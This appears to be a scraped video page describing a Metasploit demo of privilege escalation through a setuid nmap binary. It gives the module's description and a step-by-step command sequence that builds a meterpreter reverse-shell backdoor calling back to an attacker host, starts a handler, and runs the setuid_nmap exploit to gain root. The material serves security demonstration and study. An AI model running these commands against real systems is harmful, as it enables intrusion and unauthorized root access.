Setuid Nmap Exploit Metasploit Demo скачать в хорошем качестве

Setuid Nmap Exploit Metasploit Demo

Blog : http://eromang.zataz.com Twitter :   / eromang   Timeline : Metasploit PoC provided the 2012-06-13 PoC provided by: egypt Reference(s) : None Affected versions : All Nmap versions with setuid Tested on CentOS release 6.2 with Nmap 6.01 Description : Nmap's man page mentions that "Nmap should never be installed with special privileges (e.g. suid root) for security reasons.." and specifically avoids making any of its binaries setuid during installation. Nevertheless, administrators sometimes feel the need to do insecure things. This module abuses a setuid nmap binary by writing out a lua nse script containing a call to os.execute(). Note that modern interpreters will refuse to run scripts on the command line when EUID != UID, so the cmd/unix/reverse_{perl,ruby} payloads will most likely not work. Metasploit demo : You will require to have an active session on the target, this session could be done through a backdoor. sudo msfpayload linux/x86/meterpreter/reverse_tcp LHOST=192.168.178.100 X Upload the backdoor on the target use exploit/multi/handler set PAYLOAD linux/x86/meterpreter/reverse_tcp set LHOST 192.168.178.100 exploit -j sysinfo getuid use exploit/unix/local/setuid_nmap set Nmap /usr/local/bin/nmap set SESSION 1 set TARGET 1 set PAYLOAD linux/x86/meterpreter/reverse_tcp set LHOST 192.168.178.100 exploit sysinfo getuid